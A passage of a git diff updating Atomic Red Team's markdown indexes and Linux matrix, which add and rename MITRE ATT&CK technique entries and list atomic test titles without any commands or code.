TEST](https://atomicredteam.io/contributing) - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -341,6 +287,7 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #2: View sudoers access [linux, macos] - Atomic Test #3: View accounts with UID 0 [linux, macos] 
@@ -376,6 +323,7 @@ - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - Atomic Test #8: List macOS Firewall Rules [macos] 
@@ -387,6 +335,69 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# persistence +- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] + - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack 
Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #2: Create a user account on a MacOS system [macos] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.005 Startup 
Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # execution - [T1059.002 AppleScript](../../T1059.002/T1059.002.md) - Atomic Test #1: AppleScript [macos] @@ -396,7 +407,7 @@ - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.001 Launchctl](../../T1569.001/T1569.001.md) - Atomic Test #1: Launchctl [macos] - [T1053.004 Launchd](../../T1053.004/T1053.004.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 803162e4..35f36bb9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -23,6 +23,7 @@ - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #2: PowerShell - Prompt User for Password [windows] - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md) @@ -73,12 +74,14 @@ - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows] - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] 
@@ -89,7 +92,9 @@ - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -149,6 +154,7 @@ - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - Atomic Test #2: Replace binary of sticky keys [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] 
@@ -188,13 +194,16 @@ - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - Atomic Test #1: IFEO Add Debugger [windows] 
@@ -314,6 +323,7 @@ - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] - Atomic Test #3: Clear Event Logs via VBA [windows] - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] - Atomic Test #2: Dynamic C# Compile [windows] @@ -369,6 +379,8 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -384,7 +396,7 @@ - Atomic Test #9: Delete Prefetch File [windows] - Atomic Test #10: Delete TeamViewer Log Files [windows] - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #3: Create Windows System File with Attrib [windows] 
@@ -425,6 +437,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] @@ -596,6 +609,7 @@ - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) @@ -642,6 +656,7 @@ - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] - Atomic Test #3: Create a new Domain Account using PowerShell [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -661,6 +676,7 @@ - Atomic Test #1: Create local account with admin priviliges [windows] - [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - Atomic Test #1: Logon Scripts [windows] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - Atomic Test #1: Netsh Helper DLL Registration [windows] - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -673,6 +689,8 @@ - [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - Atomic Test #1: Install Outlook Home Page Persistence [windows] - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) + - Atomic Test #1: Install and Register Password Filter DLL [windows] - T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -817,6 +835,7 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows] 
@@ -872,6 +891,7 @@ - Atomic Test #8: Windows MachineGUID Discovery [windows] - Atomic Test #9: Griffon Recon [windows] - Atomic Test #10: Environment variables discovery on windows [windows] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] @@ -973,7 +993,7 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1204.002 Malicious File](../../T1204.002/T1204.002.md) - Atomic Test #1: OSTap Style Macro Execution [windows] - Atomic Test #2: OSTap Payload Download [windows] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 1830c0ba..d4573090 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -1,46 +1,50 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
| -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
[Python](../../T1059.006/T1059.006.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process 